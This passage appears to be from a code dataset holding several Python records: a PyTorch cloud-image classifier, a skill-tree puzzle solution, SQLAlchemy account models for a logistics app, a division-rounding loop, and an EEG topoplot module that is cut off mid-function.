hidden_size_1)\n self.h3 = nn.Linear(hidden_size_1, hidden_size_2)\n self.h4 = nn.Linear(hidden_size_2, hidden_size_3)\n self.o = nn.Linear(hidden_size_3, num_classes)\n\n def forward(self, x):\n x = torch.sigmoid(self.h1(x))\n x = torch.sigmoid(self.h2(x))\n x = torch.sigmoid(self.h3(x))\n x = torch.sigmoid(self.h4(x))\n x = torch.sigmoid(self.o(x))\n return x\n\n\nmodel = Net(input_size, hidden_size, num_classes)\ncriterion = nn.SoftMarginLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\ntotal_step = len(train_images)\nfor epoch in range(num_epochs):\n for i, image in enumerate(train_images):\n image = torch.Tensor(train_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(train_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n loss = criterion(outputs, label)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if (i + 1) % 100 == 0:\n print('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'.format(epoch +\n 1, num_epochs, i + 1, total_step, loss.item()))\nwith torch.no_grad():\n correct = 0\n total = 0\n for i, image in enumerate(test_images):\n image = torch.Tensor(test_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(test_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n outputs = 1 if torch.sum(outputs) >= 0.5 else 0\n if outputs == torch.sum(label):\n correct += 1\n elif outputs == 0:\n print('#############')\n print(i, outputs, torch.sum(label))\n print('Accuracy of the network on the {} test images: {} %'.format(len(\n test_images), 100 * correct / len(test_images)))\ntorch.save(model.state_dict(), 'model.ckpt')\n",
"step-5": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport cv2\nimport imageio\nimport pandas as pd\nimport glob, os\nimport numpy as np\n\nfileDir = os.getcwd()\n# os.chdir(\"./train-jpg\")\n\n# there are 40480 training examples\n# we will allocate 39000 for training\n# and the remaining 1480 will be for validation\n\ninput_size = 65536 # 256^2\nhidden_size = 20\nhidden_size_1 = 15\nhidden_size_2 = 10\nhidden_size_3 = 5\nnum_classes = 1\nlearning_rate = 0.001\nnum_epochs = 5\n\ntrain_num = 1000\ntest_num = 148\n\n# train_num = 39000\n# test_num = 1480\n\n# %% Load data--for clouds and non-clouds\nimages = []\n\nfor file in glob.glob(\"*.jpg\"):\n images.append(file)\nimages = sorted(images, key=lambda filename: int(filename[6: -4])) # string splicing so that the images are in order\n\ntrain_images = []\ntest_images = []\n\ntrain_labels = []\ntest_labels = []\nlabels = pd.read_csv(\"./train_v2.csv\") # labels are whether or not image is any sort of cloudy or haze\n\nfor i in range(train_num + test_num):\n tags = labels.iloc[i][\"tags\"]\n if i < train_num:\n train_images.append(imageio.imread(images[i], as_gray=True).flatten())\n train_labels.append(int(\"cloudy\" not in tags and \"haze\" not in tags))\n # train_labels.append(int(\"water\" not in tags))\n else:\n test_images.append(imageio.imread(images[i], as_gray=True).flatten())\n test_labels.append(int(\"cloudy\" not in tags and \"haze\" not in tags))\n # test_labels.append(int(\"water\" not in tags))\n \nclass Net(nn.Module):\n def __init__(self, input_size, hidden_size, num_classes):\n super(Net, self).__init__()\n \n # parameters\n \n # weights\n # self.h1 = nn.Sigmoid() # input_size, hidden_size\n # self.o = nn.Sigmoid() # hidden_size, num_classes\n\n self.h1 = nn.Linear(input_size, hidden_size) \n self.h2 = nn.Linear(hidden_size, hidden_size_1)\n self.h3 = nn.Linear(hidden_size_1, hidden_size_2)\n self.h4 = nn.Linear(hidden_size_2, hidden_size_3)\n self.o = nn.Linear(hidden_size_3, num_classes) \n\n def forward(self, x):\n x = torch.sigmoid(self.h1(x))\n # print(\"doing x: {}\".format(x.shape))\n x = torch.sigmoid(self.h2(x))\n x = torch.sigmoid(self.h3(x))\n x = torch.sigmoid(self.h4(x))\n x = torch.sigmoid(self.o(x))\n return x\n\n# %%\n\nmodel = Net(input_size, hidden_size, num_classes) # no device configuration here\ncriterion = nn.SoftMarginLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate) \n# model = TheModelClass(*args, **kwargs)\n# model.load_state_dict(torch.load(\"model.ckpt\"))\n# model.eval()\n# optimizer = TheOptimizerClass(*args, **kwargs)\n\n# checkpoint = torch.load('./model.ckpt')\n# model.load_state_dict(checkpoint['model_state_dict'])\n# optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n# epoch = checkpoint['epoch']\n# loss = checkpoint['loss']\n\n\ntotal_step = len(train_images)\nfor epoch in range(num_epochs):\n for i, image in enumerate(train_images): \n\n image = torch.Tensor(train_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(train_labels[i])])\n # label = label.long()\n # label = label.reshape(1,1)\n # label = label.squeeze()\n \n # Forward pass\n outputs = model(image)\n outputs = outputs.squeeze(0)\n # outputs.reshape(1,)\n loss = criterion(outputs, label)\n \n # Backward and optimize\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n if (i+1) % 100 == 0:\n print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}' \n .format(epoch+1, num_epochs, i+1, total_step, loss.item()))\n\n\n# 
%%\n\nwith torch.no_grad():\n correct = 0\n total = 0\n for i, image in enumerate(test_images):\n image = torch.Tensor(test_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(test_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n outputs = 1 if torch.sum(outputs) >= 0.5 else 0\n if outputs == torch.sum(label):\n correct += 1\n elif outputs == 0: \n print(\"#############\")\n print(i,outputs, torch.sum(label))\n # _, predicted = torch.max(outputs.data, 1)\n # correct += (predicted == labels).sum().item()\n\n print('Accuracy of the network on the {} test images: {} %'.format(len(test_images), 100 * correct / len(test_images)))\n\n\n\n# %%\n\ntorch.save(model.state_dict(), 'model.ckpt')\n\n# %%\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
def solution(skill, skill_trees):
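    # Count the skill trees that respect the learning order given in `skill`:
    # for every character of `skill` that appears in a tree, its immediate
    # prerequisite (the previous character of `skill`) must occur earlier in
    # that tree; skills not listed in `skill` may appear anywhere.
    # For the sample in __main__ below ("CBD"), only "CBADF" and "AECB" qualify.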
answer = 0
for tree in skill_trees:
able = True
for i in range(len(skill) - 1, 0, -1):
index = tree.find(skill[i])
if index != -1 and i > 0:
if tree[:index].find(skill[i - 1]) == -1:
able = False
break
if able:
answer += 1
return answer
if __name__ == "__main__":
skill = "CBD"
skill_trees = ["BACDE", "CBADF", "AECB", "BDA"]
    print(solution(skill=skill, skill_trees=skill_trees))
|
normal
|
{
"blob_id": "a72d878d246a459038640bf9c1deff562994b345",
"index": 7338,
"step-1": "<mask token>\n",
"step-2": "def solution(skill, skill_trees):\n answer = 0\n for tree in skill_trees:\n able = True\n for i in range(len(skill) - 1, 0, -1):\n index = tree.find(skill[i])\n if index != -1 and i > 0:\n if tree[:index].find(skill[i - 1]) == -1:\n able = False\n break\n if able:\n answer += 1\n return answer\n\n\n<mask token>\n",
"step-3": "def solution(skill, skill_trees):\n answer = 0\n for tree in skill_trees:\n able = True\n for i in range(len(skill) - 1, 0, -1):\n index = tree.find(skill[i])\n if index != -1 and i > 0:\n if tree[:index].find(skill[i - 1]) == -1:\n able = False\n break\n if able:\n answer += 1\n return answer\n\n\nif __name__ == '__main__':\n skill = 'CBD'\n skill_trees = ['BACDE', 'CBADF', 'AECB', 'BDA']\n solution(skill=skill, skill_trees=skill_trees)\n",
"step-4": "def solution(skill, skill_trees):\n answer = 0\n \n for tree in skill_trees:\n able = True\n for i in range(len(skill) - 1, 0, -1):\n index = tree.find(skill[i])\n if index != -1 and i > 0:\n if tree[:index].find(skill[i - 1]) == -1:\n able = False\n break\n if able: \n answer += 1\n \n return answer\n\nif __name__ == \"__main__\":\n skill = \"CBD\"\n skill_trees\t= [\"BACDE\", \"CBADF\", \"AECB\", \"BDA\"]\t\n solution(skill=skill, skill_trees=skill_trees)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from .. import db
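# Account holds the shared login/profile fields; Transporter, Consignor and
# Convoy are role-specific tables that reuse the account id as their primary key.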
class Account(db.Model):
id = db.Column(db.Integer, primary_key=True)
    acc = db.Column(db.String(50), unique=True)  # TODO: adjust length
    pwd = db.Column(db.String(50))  # TODO: adjust length
name = db.Column(db.String(20))
sex = db.Column(db.SmallInteger)
idno = db.Column(db.String(20))
phone = db.Column(db.String(20))
crttime = db.Column(db.TIMESTAMP)
crtip = db.Column(db.String(50))
crtmac = db.Column(db.String(50))
crtplat = db.Column(db.SmallInteger)
crtrole = db.Column(db.SmallInteger)
lasttime = db.Column(db.TIMESTAMP)
lastip = db.Column(db.String(50))
lastmac = db.Column(db.String(50))
lastplat = db.Column(db.SmallInteger)
lastrole = db.Column(db.SmallInteger)
transporter = db.relationship('Transporter', uselist=False)
consignor = db.relationship('Consignor', uselist=False)
def __init__(self, acc, pwd):
self.acc = acc
self.pwd = pwd
def __repr__(self):
return '<Account %s %s>'%(str(self.id), self.acc)
class Transporter(db.Model):
id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)
    d_lic = db.Column(db.String(50))  # TODO: adjust length
v_lic = db.Column(db.String(50))
account = db.relationship('Account', uselist=False)
def __init__(self):
pass
def __repr__(self):
return '<Transporter %s>'%str(self.id)
class Consignor(db.Model):
id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)
account = db.relationship('Account', uselist=False)
indents = db.relationship('Indent', lazy='dynamic')
def __init__(self):
pass
def __repr__(self):
return '<Consignor %s>'%str(self.id)
class Convoy(db.Model):
id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)
account = db.relationship('Account', uselist=False)
def __init__(self):
pass
def __repr__(self):
return '<Convoy %s>'%str(self.id)
|
normal
|
{
"blob_id": "b6824251b1165ca6c66049d40c79fccee6bc7d3a",
"index": 159,
"step-1": "<mask token>\n\n\nclass Consignor(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n account = db.relationship('Account', uselist=False)\n indents = db.relationship('Indent', lazy='dynamic')\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Consignor %s>' % str(self.id)\n\n\nclass Convoy(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n account = db.relationship('Account', uselist=False)\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Convoy %s>' % str(self.id)\n",
"step-2": "<mask token>\n\n\nclass Account(db.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __repr__(self):\n return '<Account %s %s>' % (str(self.id), self.acc)\n\n\nclass Transporter(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n d_lic = db.Column(db.String(50))\n v_lic = db.Column(db.String(50))\n account = db.relationship('Account', uselist=False)\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Transporter %s>' % str(self.id)\n\n\nclass Consignor(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n account = db.relationship('Account', uselist=False)\n indents = db.relationship('Indent', lazy='dynamic')\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Consignor %s>' % str(self.id)\n\n\nclass Convoy(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n account = db.relationship('Account', uselist=False)\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Convoy %s>' % str(self.id)\n",
"step-3": "<mask token>\n\n\nclass Account(db.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, acc, pwd):\n self.acc = acc\n self.pwd = pwd\n\n def __repr__(self):\n return '<Account %s %s>' % (str(self.id), self.acc)\n\n\nclass Transporter(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n d_lic = db.Column(db.String(50))\n v_lic = db.Column(db.String(50))\n account = db.relationship('Account', uselist=False)\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Transporter %s>' % str(self.id)\n\n\nclass Consignor(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n account = db.relationship('Account', uselist=False)\n indents = db.relationship('Indent', lazy='dynamic')\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Consignor %s>' % str(self.id)\n\n\nclass Convoy(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n account = db.relationship('Account', uselist=False)\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Convoy %s>' % str(self.id)\n",
"step-4": "<mask token>\n\n\nclass Account(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n acc = db.Column(db.String(50), unique=True)\n pwd = db.Column(db.String(50))\n name = db.Column(db.String(20))\n sex = db.Column(db.SmallInteger)\n idno = db.Column(db.String(20))\n phone = db.Column(db.String(20))\n crttime = db.Column(db.TIMESTAMP)\n crtip = db.Column(db.String(50))\n crtmac = db.Column(db.String(50))\n crtplat = db.Column(db.SmallInteger)\n crtrole = db.Column(db.SmallInteger)\n lasttime = db.Column(db.TIMESTAMP)\n lastip = db.Column(db.String(50))\n lastmac = db.Column(db.String(50))\n lastplat = db.Column(db.SmallInteger)\n lastrole = db.Column(db.SmallInteger)\n transporter = db.relationship('Transporter', uselist=False)\n consignor = db.relationship('Consignor', uselist=False)\n\n def __init__(self, acc, pwd):\n self.acc = acc\n self.pwd = pwd\n\n def __repr__(self):\n return '<Account %s %s>' % (str(self.id), self.acc)\n\n\nclass Transporter(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n d_lic = db.Column(db.String(50))\n v_lic = db.Column(db.String(50))\n account = db.relationship('Account', uselist=False)\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Transporter %s>' % str(self.id)\n\n\nclass Consignor(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n account = db.relationship('Account', uselist=False)\n indents = db.relationship('Indent', lazy='dynamic')\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Consignor %s>' % str(self.id)\n\n\nclass Convoy(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n account = db.relationship('Account', uselist=False)\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Convoy %s>' % str(self.id)\n",
"step-5": "from .. import db\n\n\nclass Account(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n acc = db.Column(db.String(50), unique=True)#TODO 调整长度\n pwd = db.Column(db.String(50))#TODO 调整长度\n name = db.Column(db.String(20))\n sex = db.Column(db.SmallInteger)\n idno = db.Column(db.String(20))\n phone = db.Column(db.String(20))\n crttime = db.Column(db.TIMESTAMP)\n crtip = db.Column(db.String(50))\n crtmac = db.Column(db.String(50))\n crtplat = db.Column(db.SmallInteger)\n crtrole = db.Column(db.SmallInteger)\n lasttime = db.Column(db.TIMESTAMP)\n lastip = db.Column(db.String(50))\n lastmac = db.Column(db.String(50))\n lastplat = db.Column(db.SmallInteger)\n lastrole = db.Column(db.SmallInteger)\n\n transporter = db.relationship('Transporter', uselist=False)\n consignor = db.relationship('Consignor', uselist=False)\n\n def __init__(self, acc, pwd):\n self.acc = acc\n self.pwd = pwd\n\n def __repr__(self):\n return '<Account %s %s>'%(str(self.id), self.acc)\n\n\nclass Transporter(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n d_lic = db.Column(db.String(50)) #TODO 长度\n v_lic = db.Column(db.String(50))\n\n account = db.relationship('Account', uselist=False)\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Transporter %s>'%str(self.id)\n\n\nclass Consignor(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n\n account = db.relationship('Account', uselist=False)\n indents = db.relationship('Indent', lazy='dynamic')\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Consignor %s>'%str(self.id)\n\n\nclass Convoy(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n\n account = db.relationship('Account', uselist=False)\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Convoy %s>'%str(self.id)\n",
"step-ids": [
8,
14,
15,
16,
18
]
}
|
[
8,
14,
15,
16,
18
] |
# coding=utf-8
while True:
a,b=input().split()
a=float(a)
b=float(b)
if b==0:
print("error")
else:
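        # a / b + 0.5 followed by int() rounds the quotient to the nearest
        # integer (round half up) for non-negative results.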
c=a/b+0.5
c=int(c)
print(c)
|
normal
|
{
"blob_id": "dab5e7ee1d14cba485cbaece1354ec8d686ca4ab",
"index": 9080,
"step-1": "<mask token>\n",
"step-2": "while True:\n a, b = input().split()\n a = float(a)\n b = float(b)\n if b == 0:\n print('error')\n else:\n c = a / b + 0.5\n c = int(c)\n print(c)\n",
"step-3": "# coding=utf-8\nwhile True:\n a,b=input().split()\n a=float(a)\n b=float(b)\n if b==0:\n print(\"error\")\n else:\n c=a/b+0.5\n c=int(c)\n print(c)",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
#!/usr/bin/env python
"""
Plot EEG data.
Usage:
plotting.py [options] [<file>]
Options:
-h --help Show this screen.
--version Show version.
--center Center the data before plotting
--sample-index=N Row index (indexed from one).
--transpose Transpose data.
--xlim=lim X-axis limits.
Data
----
ELECTRODES : dict
Dictionary indexed by electrode name with 2D positions as values
References
----------
The five percent electrode system for high-resolution EEG and ERP
measurement, Robert Oostenveld, Peter Praamstra.
"""
from __future__ import absolute_import, division, print_function
from math import cos, pi, sin
import matplotlib.lines as lines
import matplotlib.pyplot as plt
import matplotlib.transforms as transforms
import numpy as np
import pandas as pd
from scipy.interpolate import griddata
__all__ = ('ELECTRODES', 'MultiPlot', 'TopoPlot', 'topoplot')
ELECTRODES = {
'AF3': (-0.25, 0.62),
'AF4': (0.25, 0.62),
'AF7': (0.8 * cos(0.7 * pi), 0.8 * sin(0.7 * pi)),
'AF8': (0.8 * cos(0.3 * pi), 0.8 * sin(0.3 * pi)),
'AFz': (0, 0.6),
'C1': (-0.2, 0),
'C2': (0.2, 0),
'C3': (-0.4, 0),
'C4': (0.4, 0),
'C5': (-0.6, 0),
'C6': (0.6, 0),
'CP1': (-0.18, -0.2),
'CP2': (0.18, -0.2),
'CP3': (-0.36, 0.4 * sin(1.17 * pi)),
'CP4': (0.36, 0.4 * sin(1.83 * pi)),
'CP5': (0.6 * cos(1.12 * pi), 0.6 * sin(1.12 * pi)),
'CP6': (0.6 * cos(1.88 * pi), 0.6 * sin(1.88 * pi)),
'CPz': (0, -0.2),
'Cz': (0, 0),
'F1': (-0.18, 0.4),
'F2': (0.18, 0.4),
'F3': (-0.35, 0.41),
'F4': (0.35, 0.41),
'F5': (-0.5, 0.43),
'F6': (0.5, 0.43),
'F7': (0.8 * cos(0.8 * pi), 0.8 * sin(0.8 * pi)),
'F8': (0.8 * cos(0.2 * pi), 0.8 * sin(0.2 * pi)),
'FC1': (-0.2, 0.21),
'FC2': (0.2, 0.21),
'FC3': (-0.39, 0.22),
'FC4': (0.39, 0.22),
'FC5': (-0.57, 0.23),
'FC6': (0.57, 0.23),
'FCz': (0, 0.2),
'FP1': (0.8 * cos(0.6 * pi), 0.8 * sin(0.6 * pi)),
'FP2': (0.8 * cos(0.4 * pi), 0.8 * sin(0.4 * pi)),
'Fpz': (0, 0.8),
'FT7': (0.8 * cos(0.9 * pi), 0.8 * sin(0.9 * pi)),
'FT8': (0.8 * cos(0.1 * pi), 0.8 * sin(0.1 * pi)),
'Fz': (0, 0.4),
'Iz': (0, -1),
'Nz': (0, 1),
'P1': (-0.18, -0.41),
'P2': (0.18, -0.41),
'P3': (-0.35, -0.42),
'P4': (0.35, -0.42),
'P5': (-0.5, -0.44),
'P6': (0.5, -0.44),
'P7': (0.8 * cos(1.2 * pi), 0.8 * sin(1.2 * pi)),
'P8': (0.8 * cos(1.8 * pi), 0.8 * sin(1.8 * pi)),
'PO3': (-0.24, -0.62),
'PO4': (0.24, -0.62),
'PO7': (0.8 * cos(1.3 * pi), 0.8 * sin(1.3 * pi)),
'PO8': (0.8 * cos(1.7 * pi), 0.8 * sin(1.7 * pi)),
'POz': (0, -0.6),
'Pz': (0, -0.4),
'O1': (0.8 * cos(1.4 * pi), 0.8 * sin(1.4 * pi)),
'O2': (0.8 * cos(1.6 * pi), 0.8 * sin(1.6 * pi)),
'Oz': (0, -0.8),
'T7': (-0.8, 0),
'T8': (0.8, 0),
'T9': (-1, 0),
'T10': (1, 0),
'TP7': (0.8 * cos(1.1 * pi), 0.8 * sin(1.1 * pi)),
'TP8': (0.8 * cos(1.9 * pi), 0.8 * sin(1.9 * pi)),
'TP9': (cos(1.1 * pi), sin(1.1 * pi)),
'TP10': (cos(1.9 * pi), sin(1.9 * pi)),
}
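# Positions are (x, y) points in a unit-circle head layout: the outer head is
# drawn with radius 1 and the inner head with radius 0.8 (see draw_head and
# draw_inner_head below).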
class TopoPlot(object):
"""Topographic plot."""
def __init__(self, data=None, axes=None):
"""Setup defaults.
Parameters
----------
data : Pandas.Series or dict
Pandas Series with values indexed by electrodes.
axes : matplotlib.axes.AxesSubplot object
Axis object to render on.
"""
if axes is None:
self.figure = plt.figure()
axes = self.figure.gca()
else:
self.figure = axes.get_figure()
self.axes = axes
self.center = np.array((0, 0))
if isinstance(data, dict):
self.data = pd.Series(data)
elif isinstance(data, pd.Series):
self.data = data
elif data is None:
self.data = None
else:
raise ValueError("Wrong type of value for 'data': {}".format(
type(data)))
@staticmethod
def normalize_electrode_name(name):
"""Normalize electrode name.
Parameters
----------
name : str
Name of electrode to be normalized
Examples
--------
>>> TopoPlot.normalize_electrode_name('fpz')
'Fpz'
>>> TopoPlot.normalize_electrode_name('AFZ')
'AFz'
"""
return name.upper().replace('FPZ', 'Fpz').replace('Z', 'z')
def draw_electrodes(self):
"""Draw electrodes."""
for electrode, position in ELECTRODES.items():
circle = plt.Circle(self.center + position,
radius=0.04, fill=True,
facecolor=(1, 1, 1))
self.axes.add_patch(circle)
position = self.center + position
self.axes.text(position[0], position[1], electrode,
verticalalignment='center',
horizontalalignment='center',
size=6)
def draw_head(self):
"""Draw outer head."""
circle = plt.Circle(self.center, radius=1, fill=False)
self.axes.add_patch(circle)
def draw_inner_head(self):
"""Draw inner head."""
circle = plt.Circle(self.center, radius=0.8, fill=False)
self.axes.add_patch(circle)
def draw_nose(self):
"""Draw nose."""
nose = plt.Line2D([sin(-0.1), 0, sin(0.1)],
[cos(-0.1), 1.1, cos(0.1)],
color=(0, 0, 0))
self.axes.add_line(nose)
def draw_data(self, method='linear', number_of_contours=10):
"""Draw countours from provided data."""
if self.data is not None:
# Coordinates for points to interpolate to
xi, yi = np.mgrid[-1:1:100j, -1:1:100j]
# Electrode positions for data to interpolate from
points = []
for electrode in self.data.index:
name = TopoPlot.normalize_electrode_name(electrode)
points.append(ELECTRODES[name])
# Interpolate
# TODO: Will not work with 2 electrodes.
zi = griddata(points, self.data.values, (xi, yi), method=method)
# Defaults
if number_of_contours is None:
number_of_contours = 10
# Draw
plt.contourf(xi, yi, zi, number_of_contours)
# TODO: center
def draw(self, title=None, method='linear', number_of_contours=None):
"""Draw all components in topoplot including the data.
Parameters
----------
title : str, optional
Title to put on the plot
        method : str, optional
Interpolation method
number_of_contours : int
Number of contours in the colored plot.
Examples
--------
>>> import matplotlib.pyplot as plt
>>> data = {'O1': 1, 'O2': 2, 'P3': -2, 'P4': -4}
>>> plt.ion()
>>> topo_plot = TopoPlot(data)
>>> topo_plot.draw()
"""
self.draw_head()
self.draw_inner_head()
self.draw_electrodes()
self.draw_nose()
self.draw_data(method=method, number_of_contours=number_of_contours)
self.axes.axis((-1.2, 1.2, -1.2, 1.2))
self.axes.axis('equal')
if title is not None:
self.axes.set_title(title)
class MultiPlot(TopoPlot):
"""Multiple plots organized topographically.
References
----------
http://www.fieldtriptoolbox.org/reference/ft_multiploter
"""
def __init__(self, data=None, axes=None, xlim=None, ylim=None):
"""Setup defaults.
Parameters
----------
data : Pandas.DataFrame
Pandas DataFrame with values indexed by electrodes.
axes : matplotlib.axes.AxesSubplot object
Axis object to render on.
"""
if axes is None:
self.figure = plt.figure()
axes = self.figure.gca()
else:
self.figure = axes.get_figure()
self.axes = axes
# Contains a list of axes used to plot data data from individual
# electrodes
self._subaxes = []
self.xlim = xlim
self.ylim = ylim
self.center = np.array((0, 0))
if isinstance(data, pd.DataFrame):
self.data = data
elif data is None:
self.data = None
else:
raise ValueError("Wrong type of value for 'data': {}".format(
type(data)))
def add_subplot_axes(self, ax, rect, axis_bgcolor=None):
"""Add subaxes to currect specified axes.
References
----------
Pablo https://stackoverflow.com/users/2309442/pablo
Pablo's answer to "Embedding small plots inside subplots in matplotlib"
https://stackoverflow.com/questions/17458580/
"""
# Modified from
# https://stackoverflow.com/questions/17458580/
box = ax.get_position()
width, height = box.width, box.height
subaxes_box = [(rect[0], rect[1]),
(rect[0] + rect[2], rect[1] + rect[3])]
subaxes_display_coords = ax.transData.transform(subaxes_box)
trans_figure = self.figure.transFigure.inverted()
subaxes_figure_coords = trans_figure.transform(subaxes_display_coords)
x, y = subaxes_figure_coords[0, :]
width, height = (subaxes_figure_coords[1, :] -
subaxes_figure_coords[0, :])
subaxes = self.figure.add_axes(
[x, y, width, height], axis_bgcolor=axis_bgcolor)
x_labelsize = subaxes.get_xticklabels()[0].get_size()
y_labelsize = subaxes.get_yticklabels()[0].get_size()
x_labelsize *= rect[2] ** 0.5
y_labelsize *= rect[3] ** 0.5
subaxes.xaxis.set_tick_params(labelsize=x_labelsize)
subaxes.yaxis.set_tick_params(labelsize=y_labelsize)
return subaxes
def draw_data(self, type='plot', width=None, height=None,
xlim=None, ylim=None,
vmin=None, vmax=None,
axis=False, yscale='linear'):
"""Draw data.
Parameters
----------
type : 'plot', 'spectrogram', optional
Type of plot
xlim : 2-tuple of floats, optional
X-axis limits
ylim : 2-tuple of floats, optional
Y-axis limits
vmin : float, optional
Minimum value for spectrogram colormap
vmax : float, optional
Maximum value for spectrogram colormap
axis : bool, optional
Determine whether the axis should be shown
"""
if self.data is not None:
if ylim is None:
if self.ylim is None and type != 'spectrogram':
ylim = self.auto_ylim(xlim, yscale=yscale)
else:
ylim = self.ylim
if xlim is None:
xlim = self.xlim
if vmin is None:
vmin = 0
# Determine a suitable width for subaxes
number_of_electrodes = len([
electrode
for electrode in self.data.columns
if electrode in ELECTRODES])
if width is None:
if number_of_electrodes > 32:
width = 0.15
else:
width = 0.25
if height is None:
height = 0.25
for electrode in self.data.columns:
if electrode in ELECTRODES:
# Axes and position
x, y = ELECTRODES[electrode]
subaxes = self.add_subplot_axes(
self.axes,
[x - width / 2, y - height / 2, width, height],
axis_bgcolor='w')
# Actual data plot
if type == 'plot':
self.data.ix[:, electrode].plot(
ax=subaxes, xlim=xlim, ylim=ylim)
if not axis:
# x-axis
trans = transforms.blended_transform_factory(
subaxes.transAxes, subaxes.transData)
line = lines.Line2D(
(0, 1), (0, 0),
transform=trans, color=(0, 0, 0))
subaxes.add_line(line)
trans = transforms.blended_transform_factory(
subaxes.transAxes, subaxes.transAxes)
line = lines.Line2D(
(0, 0), (0, 1),
transform=trans, color=(0, 0, 0))
subaxes.add_line(line)
elif type == 'spectrogram':
spectrum, frequencies, midpoints, axes = plt.specgram(
self.data.ix[:, electrode],
Fs=self.data.sampling_rate,
vmin=vmin,
vmax=vmax,
axes=subaxes)
# Adjust axis around spectrogram image.
if xlim is None:
xlim = midpoints[0], midpoints[-1]
subaxes.set_xlim(xlim)
if ylim is None:
ylim = frequencies[0], frequencies[-1]
subaxes.set_ylim(ylim)
else:
raise ValueError("Wrong value for 'type' argument")
if not axis:
subaxes.set_axis_off()
# Annotation
# http://matplotlib.org/users/transforms_tutorial.html
subaxes.text(0.5, 0.95, electrode,
transform=subaxes.transAxes,
fontweight='bold', va='top', ha='center')
subaxes.set_yticklabels([])
subaxes.set_xticklabels([])
self._subaxes.append(subaxes)
@property
def xlim(self):
"""Return xlim for subplots."""
lim = [ax.get_xlim() for ax in self._subaxes]
if lim == []:
lim = None
return lim
@xlim.setter
def xlim(self, left=None, right=None):
"""Set x-axis limits on all subplots."""
for ax in self._subaxes:
ax.set_xlim(left, right)
self.figure.canvas.draw()
@property
def ylim(self):
"""Return ylim for subplots."""
lim = [ax.get_ylim() for ax in self._subaxes]
if lim == []:
lim = None
return lim
@ylim.setter
def ylim(self, bottom=None, top=None):
"""Set y-axis limits on all subplots."""
for ax in self._subaxes:
ax.set_ylim(bottom, top)
self.figure.canvas.draw()
@property
def yscale(self):
"""Return yscale for subplots."""
yscales = [ax.get_yscale() for ax in self._subaxes]
return yscales
@yscale.setter
def yscale(self, value='linear'):
"""Set y-axis limits on all subplots."""
for ax in self._subaxes:
ax.set_yscale(value)
self.figure.canvas.draw()
def auto_ylim(self, xlim=None, yscale='linear'):
"""Return an estimate for a good ylim.
Parameters
----------
xlim : 2-tuple, optional
Limits in (the index of) the data from where the scaling should be
computed.
yscale : linear or log, optional
Scaling of y-axis.
"""
electrodes = [col for col in self.data.columns
if col in ELECTRODES]
if xlim is None:
data = self.data.ix[:, electrodes]
else:
indices = ((self.data.index >= xlim[0]) &
